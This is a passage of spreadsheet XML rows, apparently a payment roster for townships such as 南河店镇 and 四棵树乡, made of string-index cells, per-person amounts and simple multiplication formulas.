      </c>
    </row>
    <row r="2508" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2508" s="13" t="s">
        <v>6562</v>
      </c>
      <c r="B2508" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2508" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2508" s="14" t="s">
        <v>6563</v>
      </c>
      <c r="E2508" s="14" t="s">
        <v>496</v>
      </c>
      <c r="F2508" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2508" s="14">
        <v>2</v>
      </c>
      <c r="H2508" s="14">
        <v>330</v>
      </c>
      <c r="I2508" s="14">
        <f t="shared" si="116"/>
        <v>660</v>
      </c>
      <c r="J2508" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2508" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2509" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2509" s="13" t="s">
        <v>6564</v>
      </c>
      <c r="B2509" s="14" t="str">
        <f>B2508</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2509" s="6" t="str">
        <f>C2508</f>
        <v>校委会</v>
      </c>
      <c r="D2509" s="81" t="s">
        <v>6565</v>
      </c>
      <c r="E2509" s="42" t="s">
        <v>6566</v>
      </c>
      <c r="F2509" s="14" t="str">
        <f>F2508</f>
        <v>4113211124</v>
      </c>
      <c r="G2509" s="14"/>
      <c r="H2509" s="14"/>
      <c r="I2509" s="14"/>
      <c r="J2509" s="14"/>
      <c r="K2509" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2510" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2510" s="13" t="s">
        <v>6567</v>
      </c>
      <c r="B2510" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2510" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2510" s="14" t="s">
        <v>3014</v>
      </c>
      <c r="E2510" s="14" t="s">
        <v>6473</v>
      </c>
      <c r="F2510" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2510" s="14">
        <v>1</v>
      </c>
      <c r="H2510" s="14">
        <v>340</v>
      </c>
      <c r="I2510" s="14">
        <f t="shared" ref="I2510:I2527" si="117">H2510*G2510</f>
        <v>340</v>
      </c>
      <c r="J2510" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2510" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2511" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2511" s="13" t="s">
        <v>6568</v>
      </c>
      <c r="B2511" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2511" s="14" t="s">
        <v>6569</v>
      </c>
      <c r="D2511" s="14" t="s">
        <v>6570</v>
      </c>
      <c r="E2511" s="14" t="s">
        <v>4111</v>
      </c>
      <c r="F2511" s="14" t="s">
        <v>6571</v>
      </c>
      <c r="G2511" s="14">
        <v>1</v>
      </c>
      <c r="H2511" s="14">
        <v>340</v>
      </c>
      <c r="I2511" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2511" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2511" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2512" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2512" s="13" t="s">
        <v>6572</v>
      </c>
      <c r="B2512" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2512" s="14" t="s">
        <v>6573</v>
      </c>
      <c r="D2512" s="14" t="s">
        <v>6574</v>
      </c>
      <c r="E2512" s="14" t="s">
        <v>6575</v>
      </c>
      <c r="F2512" s="14" t="s">
        <v>6576</v>
      </c>
      <c r="G2512" s="14">
        <v>1</v>
      </c>
      <c r="H2512" s="14">
        <v>340</v>
      </c>
      <c r="I2512" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2512" s="14" t="s">
        <v>4850</v>
      </c>
      <c r="K2512" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2513" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2513" s="13" t="s">
        <v>6577</v>
      </c>
      <c r="B2513" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2513" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2513" s="14" t="s">
        <v>6578</v>
      </c>
      <c r="E2513" s="14" t="s">
        <v>6459</v>
      </c>
      <c r="F2513" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2513" s="14">
        <v>1</v>
      </c>
      <c r="H2513" s="14">
        <v>340</v>
      </c>
      <c r="I2513" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2513" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K2513" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2514" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2514" s="13" t="s">
        <v>6579</v>
      </c>
      <c r="B2514" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2514" s="14" t="s">
        <v>6580</v>
      </c>
      <c r="D2514" s="14" t="s">
        <v>1211</v>
      </c>
      <c r="E2514" s="14" t="s">
        <v>6490</v>
      </c>
      <c r="F2514" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2514" s="14">
        <v>1</v>
      </c>
      <c r="H2514" s="14">
        <v>340</v>
      </c>
      <c r="I2514" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2514" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2514" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2515" ht="23" customHeight="1" spans="1:11">
      <c r="A2515" s="13" t="s">
        <v>6581</v>
      </c>
      <c r="B2515" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2515" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2515" s="14" t="s">
        <v>6583</v>
      </c>
      <c r="E2515" s="14" t="s">
        <v>6584</v>
      </c>
      <c r="F2515" s="14" t="s">
        <v>6585</v>
      </c>
      <c r="G2515" s="14">
        <v>1</v>
      </c>
      <c r="H2515" s="14">
        <v>340</v>
      </c>
      <c r="I2515" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2515" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2515" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2516" ht="23" customHeight="1" spans="1:11">
      <c r="A2516" s="13" t="s">
        <v>6586</v>
      </c>
      <c r="B2516" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2516" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2516" s="14" t="s">
        <v>6461</v>
      </c>
      <c r="E2516" s="14" t="s">
        <v>6587</v>
      </c>
      <c r="F2516" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2516" s="14">
        <v>1</v>
      </c>
      <c r="H2516" s="14">
        <v>340</v>
      </c>
      <c r="I2516" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2516" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2516" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2517" ht="23" customHeight="1" spans="1:11">
      <c r="A2517" s="13" t="s">
        <v>6589</v>
      </c>
      <c r="B2517" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2517" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2517" s="14" t="s">
        <v>6590</v>
      </c>
      <c r="E2517" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F2517" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2517" s="14">
        <v>1</v>
      </c>
      <c r="H2517" s="14">
        <v>340</v>
      </c>
      <c r="I2517" s="14">
        <f t="shared" si="117"/>
        <v>340</v>
      </c>
      <c r="J2517" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2517" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2518" ht="23" customHeight="1" spans="1:11">
      <c r="A2518" s="13" t="s">
        <v>6591</v>
      </c>
      <c r="B2518" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2518" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2518" s="14" t="s">
        <v>6592</v>
      </c>
      <c r="E2518" s="14" t="s">
        <v>6593</v>
      </c>
      <c r="F2518" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2518" s="14">
        <v>2</v>
      </c>
      <c r="H2518" s="14">
        <v>300</v>
      </c>
      <c r="I2518" s="14">
        <f t="shared" si="117"/>
        <v>600</v>
      </c>
      <c r="J2518" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2518" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2519" ht="23" customHeight="1" spans="1:11">
      <c r="A2519" s="13" t="s">
        <v>6594</v>
      </c>
      <c r="B2519" s="14" t="str">
        <f>B2518</f>
        <v>南河店镇</v>
      </c>
      <c r="C2519" s="14" t="str">
        <f>C2518</f>
        <v>南河店镇</v>
      </c>
      <c r="D2519" s="18" t="s">
        <v>6595</v>
      </c>
      <c r="E2519" s="19" t="s">
        <v>6596</v>
      </c>
      <c r="F2519" s="14" t="str">
        <f>F2518</f>
        <v>4113211004</v>
      </c>
      <c r="G2519" s="14"/>
      <c r="H2519" s="14"/>
      <c r="I2519" s="14"/>
      <c r="J2519" s="14"/>
      <c r="K2519" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2520" ht="23" customHeight="1" spans="1:11">
      <c r="A2520" s="13" t="s">
        <v>6597</v>
      </c>
      <c r="B2520" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2520" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2520" s="14" t="s">
        <v>6598</v>
      </c>
      <c r="E2520" s="14" t="s">
        <v>6599</v>
      </c>
      <c r="F2520" s="14" t="s">
        <v>6585</v>
      </c>
      <c r="G2520" s="14">
        <v>1</v>
      </c>
      <c r="H2520" s="14">
        <v>340</v>
      </c>
      <c r="I2520" s="14">
        <f>H2520*G2520</f>
        <v>340</v>
      </c>
      <c r="J2520" s="14" t="s">
        <v>6176</v>
      </c>
      <c r="K2520" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2521" ht="23" customHeight="1" spans="1:11">
      <c r="A2521" s="13" t="s">
        <v>6600</v>
      </c>
      <c r="B2521" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2521" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2521" s="14" t="s">
        <v>6601</v>
      </c>
      <c r="E2521" s="14" t="s">
        <v>2703</v>
      </c>
      <c r="F2521" s="14" t="s">
        <v>6602</v>
      </c>
      <c r="G2521" s="14">
        <v>1</v>
      </c>
      <c r="H2521" s="14">
        <v>340</v>
      </c>
      <c r="I2521" s="14">
        <f>H2521*G2521</f>
        <v>340</v>
      </c>
      <c r="J2521" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2521" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2522" ht="23" customHeight="1" spans="1:11">
      <c r="A2522" s="13" t="s">
        <v>6603</v>
      </c>
      <c r="B2522" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2522" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2522" s="14" t="s">
        <v>6604</v>
      </c>
      <c r="E2522" s="14" t="s">
        <v>6605</v>
      </c>
      <c r="F2522" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2522" s="14">
        <v>2</v>
      </c>
      <c r="H2522" s="14">
        <v>300</v>
      </c>
      <c r="I2522" s="14">
        <f>H2522*G2522</f>
        <v>600</v>
      </c>
      <c r="J2522" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2522" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2523" ht="23" customHeight="1" spans="1:11">
      <c r="A2523" s="13" t="s">
        <v>6606</v>
      </c>
      <c r="B2523" s="14" t="str">
        <f>B2522</f>
        <v>南河店镇</v>
      </c>
      <c r="C2523" s="14" t="str">
        <f>C2522</f>
        <v>南河店镇</v>
      </c>
      <c r="D2523" s="18" t="s">
        <v>6607</v>
      </c>
      <c r="E2523" s="19" t="s">
        <v>6608</v>
      </c>
      <c r="F2523" s="14" t="str">
        <f>F2522</f>
        <v>4113211004</v>
      </c>
      <c r="G2523" s="14"/>
      <c r="H2523" s="14"/>
      <c r="I2523" s="14"/>
      <c r="J2523" s="14"/>
      <c r="K2523" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2524" ht="23" customHeight="1" spans="1:11">
      <c r="A2524" s="13" t="s">
        <v>6609</v>
      </c>
      <c r="B2524" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2524" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="D2524" s="14" t="s">
        <v>6610</v>
      </c>
      <c r="E2524" s="14" t="s">
        <v>6611</v>
      </c>
      <c r="F2524" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2524" s="14">
        <v>1</v>
      </c>
      <c r="H2524" s="14">
        <v>340</v>
      </c>
      <c r="I2524" s="14">
        <f>H2524*G2524</f>
        <v>340</v>
      </c>
      <c r="J2524" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2524" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2525" ht="23" customHeight="1" spans="1:11">
      <c r="A2525" s="13" t="s">
        <v>6612</v>
      </c>
      <c r="B2525" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2525" s="14" t="s">
        <v>6613</v>
      </c>
      <c r="D2525" s="14" t="s">
        <v>6614</v>
      </c>
      <c r="E2525" s="14" t="s">
        <v>6615</v>
      </c>
      <c r="F2525" s="14" t="s">
        <v>6616</v>
      </c>
      <c r="G2525" s="14">
        <v>3</v>
      </c>
      <c r="H2525" s="14">
        <v>265</v>
      </c>
      <c r="I2525" s="14">
        <f>H2525*G2525</f>
        <v>795</v>
      </c>
      <c r="J2525" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2525" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2526" ht="23" customHeight="1" spans="1:11">
      <c r="A2526" s="13" t="s">
        <v>6617</v>
      </c>
      <c r="B2526" s="14" t="str">
        <f>B2525</f>
        <v>南河店镇</v>
      </c>
      <c r="C2526" s="14" t="str">
        <f>C2525</f>
        <v>蚕厂家属院</v>
      </c>
      <c r="D2526" s="20" t="s">
        <v>6618</v>
      </c>
      <c r="E2526" s="20" t="s">
        <v>3368</v>
      </c>
      <c r="F2526" s="14" t="str">
        <f>F2525</f>
        <v>4113211009</v>
      </c>
      <c r="G2526" s="14"/>
      <c r="H2526" s="14"/>
      <c r="I2526" s="14"/>
      <c r="J2526" s="14"/>
      <c r="K2526" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2527" ht="23" customHeight="1" spans="1:11">
      <c r="A2527" s="13" t="s">
        <v>6619</v>
      </c>
      <c r="B2527" s="14" t="str">
        <f>B2526</f>
        <v>南河店镇</v>
      </c>
      <c r="C2527" s="14" t="str">
        <f>C2526</f>
        <v>蚕厂家属院</v>
      </c>
      <c r="D2527" s="20" t="s">
        <v>6620</v>
      </c>
      <c r="E2527" s="20" t="s">
        <v>6621</v>
      </c>
      <c r="F2527" s="14" t="str">
        <f>F2526</f>
        <v>4113211009</v>
      </c>
      <c r="G2527" s="14"/>
      <c r="H2527" s="14"/>
      <c r="I2527" s="14"/>
      <c r="J2527" s="14"/>
      <c r="K2527" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2528" ht="23" customHeight="1" spans="1:11">
      <c r="A2528" s="13" t="s">
        <v>6622</v>
      </c>
      <c r="B2528" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2528" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2528" s="14" t="s">
        <v>6623</v>
      </c>
      <c r="E2528" s="14" t="s">
        <v>6624</v>
      </c>
      <c r="F2528" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2528" s="14">
        <v>1</v>
      </c>
      <c r="H2528" s="14">
        <v>340</v>
      </c>
      <c r="I2528" s="14">
        <f t="shared" ref="I2528:I2535" si="118">H2528*G2528</f>
        <v>340</v>
      </c>
      <c r="J2528" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2528" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2529" ht="23" customHeight="1" spans="1:11">
      <c r="A2529" s="13" t="s">
        <v>6625</v>
      </c>
      <c r="B2529" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2529" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2529" s="14" t="s">
        <v>6626</v>
      </c>
      <c r="E2529" s="14" t="s">
        <v>6627</v>
      </c>
      <c r="F2529" s="14" t="s">
        <v>6628</v>
      </c>
      <c r="G2529" s="14">
        <v>1</v>
      </c>
      <c r="H2529" s="14">
        <v>340</v>
      </c>
      <c r="I2529" s="14">
        <f t="shared" si="118"/>
        <v>340</v>
      </c>
      <c r="J2529" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2529" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2530" ht="23" customHeight="1" spans="1:11">
      <c r="A2530" s="13" t="s">
        <v>6629</v>
      </c>
      <c r="B2530" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2530" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2530" s="14" t="s">
        <v>6630</v>
      </c>
      <c r="E2530" s="14" t="s">
        <v>3049</v>
      </c>
      <c r="F2530" s="14" t="s">
        <v>6602</v>
      </c>
      <c r="G2530" s="14">
        <v>1</v>
      </c>
      <c r="H2530" s="14">
        <v>340</v>
      </c>
      <c r="I2530" s="14">
        <f t="shared" si="118"/>
        <v>340</v>
      </c>
      <c r="J2530" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2530" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2531" ht="23" customHeight="1" spans="1:11">
      <c r="A2531" s="13" t="s">
        <v>6631</v>
      </c>
      <c r="B2531" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2531" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2531" s="14" t="s">
        <v>6632</v>
      </c>
      <c r="E2531" s="14" t="s">
        <v>6633</v>
      </c>
      <c r="F2531" s="14" t="s">
        <v>6628</v>
      </c>
      <c r="G2531" s="14">
        <v>1</v>
      </c>
      <c r="H2531" s="14">
        <v>340</v>
      </c>
      <c r="I2531" s="14">
        <f t="shared" si="118"/>
        <v>340</v>
      </c>
      <c r="J2531" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2531" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2532" ht="23" customHeight="1" spans="1:11">
      <c r="A2532" s="13" t="s">
        <v>6634</v>
      </c>
      <c r="B2532" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2532" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2532" s="14" t="s">
        <v>6635</v>
      </c>
      <c r="E2532" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F2532" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2532" s="14">
        <v>1</v>
      </c>
      <c r="H2532" s="14">
        <v>340</v>
      </c>
      <c r="I2532" s="14">
        <f t="shared" si="118"/>
        <v>340</v>
      </c>
      <c r="J2532" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2532" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2533" ht="23" customHeight="1" spans="1:11">
      <c r="A2533" s="13" t="s">
        <v>6636</v>
      </c>
      <c r="B2533" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2533" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2533" s="14" t="s">
        <v>6637</v>
      </c>
      <c r="E2533" s="14" t="s">
        <v>6638</v>
      </c>
      <c r="F2533" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2533" s="14">
        <v>1</v>
      </c>
      <c r="H2533" s="14">
        <v>340</v>
      </c>
      <c r="I2533" s="14">
        <f t="shared" si="118"/>
        <v>340</v>
      </c>
      <c r="J2533" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2533" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2534" ht="23" customHeight="1" spans="1:11">
      <c r="A2534" s="13" t="s">
        <v>6639</v>
      </c>
      <c r="B2534" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2534" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2534" s="14" t="s">
        <v>6640</v>
      </c>
      <c r="E2534" s="14" t="s">
        <v>6641</v>
      </c>
      <c r="F2534" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2534" s="14">
        <v>1</v>
      </c>
      <c r="H2534" s="14">
        <v>340</v>
      </c>
      <c r="I2534" s="14">
        <f t="shared" si="118"/>
        <v>340</v>
      </c>
      <c r="J2534" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2534" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2535" ht="23" customHeight="1" spans="1:11">
      <c r="A2535" s="13" t="s">
        <v>6642</v>
      </c>
      <c r="B2535" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2535" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2535" s="14" t="s">
        <v>6643</v>
      </c>
      <c r="E2535" s="14" t="s">
        <v>6644</v>
      </c>
      <c r="F2535" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2535" s="14">
        <v>2</v>
      </c>
      <c r="H2535" s="14">
        <v>300</v>
      </c>
      <c r="I2535" s="14">
        <f t="shared" si="118"/>
        <v>600</v>
      </c>
      <c r="J2535" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2535" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2536" ht="23" customHeight="1" spans="1:11">
      <c r="A2536" s="13" t="s">
        <v>6645</v>
      </c>
      <c r="B2536" s="14" t="str">
        <f>B2535</f>
        <v>南河店镇</v>
      </c>
      <c r="C2536" s="14" t="str">
        <f>C2535</f>
        <v>粮食局</v>
      </c>
      <c r="D2536" s="18" t="s">
        <v>6646</v>
      </c>
      <c r="E2536" s="19" t="s">
        <v>6621</v>
      </c>
      <c r="F2536" s="14" t="str">
        <f>F2535</f>
        <v>4113211004</v>
      </c>
      <c r="G2536" s="14"/>
      <c r="H2536" s="14"/>
      <c r="I2536" s="14"/>
      <c r="J2536" s="14"/>
      <c r="K2536" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2537" ht="23" customHeight="1" spans="1:11">
      <c r="A2537" s="13" t="s">
        <v>6647</v>
      </c>
      <c r="B2537" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2537" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2537" s="14" t="s">
        <v>6648</v>
      </c>
      <c r="E2537" s="14" t="s">
        <v>6633</v>
      </c>
      <c r="F2537" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2537" s="14">
        <v>1</v>
      </c>
      <c r="H2537" s="14">
        <v>340</v>
      </c>
      <c r="I2537" s="14">
        <f t="shared" ref="I2537:I2546" si="119">H2537*G2537</f>
        <v>340</v>
      </c>
      <c r="J2537" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2537" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2538" ht="23" customHeight="1" spans="1:11">
      <c r="A2538" s="13" t="s">
        <v>6649</v>
      </c>
      <c r="B2538" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2538" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2538" s="14" t="s">
        <v>6650</v>
      </c>
      <c r="E2538" s="14" t="s">
        <v>6651</v>
      </c>
      <c r="F2538" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2538" s="14">
        <v>1</v>
      </c>
      <c r="H2538" s="14">
        <v>340</v>
      </c>
      <c r="I2538" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2538" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2538" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2539" ht="23" customHeight="1" spans="1:11">
      <c r="A2539" s="13" t="s">
        <v>6652</v>
      </c>
      <c r="B2539" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2539" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2539" s="14" t="s">
        <v>6653</v>
      </c>
      <c r="E2539" s="14" t="s">
        <v>2707</v>
      </c>
      <c r="F2539" s="14" t="s">
        <v>6616</v>
      </c>
      <c r="G2539" s="14">
        <v>1</v>
      </c>
      <c r="H2539" s="14">
        <v>340</v>
      </c>
      <c r="I2539" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2539" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2539" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2540" ht="23" customHeight="1" spans="1:11">
      <c r="A2540" s="13" t="s">
        <v>6654</v>
      </c>
      <c r="B2540" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2540" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2540" s="14" t="s">
        <v>6655</v>
      </c>
      <c r="E2540" s="14" t="s">
        <v>6545</v>
      </c>
      <c r="F2540" s="14" t="s">
        <v>6585</v>
      </c>
      <c r="G2540" s="14">
        <v>1</v>
      </c>
      <c r="H2540" s="14">
        <v>340</v>
      </c>
      <c r="I2540" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2540" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2540" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2541" ht="23" customHeight="1" spans="1:11">
      <c r="A2541" s="13" t="s">
        <v>6656</v>
      </c>
      <c r="B2541" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2541" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2541" s="14" t="s">
        <v>6657</v>
      </c>
      <c r="E2541" s="14" t="s">
        <v>6658</v>
      </c>
      <c r="F2541" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2541" s="14">
        <v>1</v>
      </c>
      <c r="H2541" s="14">
        <v>340</v>
      </c>
      <c r="I2541" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2541" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2541" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2542" ht="23" customHeight="1" spans="1:11">
      <c r="A2542" s="13" t="s">
        <v>6659</v>
      </c>
      <c r="B2542" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2542" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2542" s="14" t="s">
        <v>6660</v>
      </c>
      <c r="E2542" s="14" t="s">
        <v>6661</v>
      </c>
      <c r="F2542" s="14" t="s">
        <v>6585</v>
      </c>
      <c r="G2542" s="14">
        <v>1</v>
      </c>
      <c r="H2542" s="14">
        <v>340</v>
      </c>
      <c r="I2542" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2542" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2542" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2543" ht="23" customHeight="1" spans="1:11">
      <c r="A2543" s="13" t="s">
        <v>6662</v>
      </c>
      <c r="B2543" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2543" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2543" s="14" t="s">
        <v>6663</v>
      </c>
      <c r="E2543" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F2543" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2543" s="14">
        <v>1</v>
      </c>
      <c r="H2543" s="14">
        <v>340</v>
      </c>
      <c r="I2543" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2543" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2543" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2544" ht="23" customHeight="1" spans="1:11">
      <c r="A2544" s="13" t="s">
        <v>6664</v>
      </c>
      <c r="B2544" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2544" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2544" s="14" t="s">
        <v>6665</v>
      </c>
      <c r="E2544" s="14" t="s">
        <v>6666</v>
      </c>
      <c r="F2544" s="14" t="s">
        <v>6616</v>
      </c>
      <c r="G2544" s="14">
        <v>1</v>
      </c>
      <c r="H2544" s="14">
        <v>340</v>
      </c>
      <c r="I2544" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2544" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2544" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2545" ht="23" customHeight="1" spans="1:11">
      <c r="A2545" s="13" t="s">
        <v>6667</v>
      </c>
      <c r="B2545" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2545" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2545" s="14" t="s">
        <v>6668</v>
      </c>
      <c r="E2545" s="14" t="s">
        <v>3046</v>
      </c>
      <c r="F2545" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2545" s="14">
        <v>1</v>
      </c>
      <c r="H2545" s="14">
        <v>340</v>
      </c>
      <c r="I2545" s="14">
        <f t="shared" si="119"/>
        <v>340</v>
      </c>
      <c r="J2545" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2545" s="14" t="s">
        <v>225</v>
      </c>
    </row>
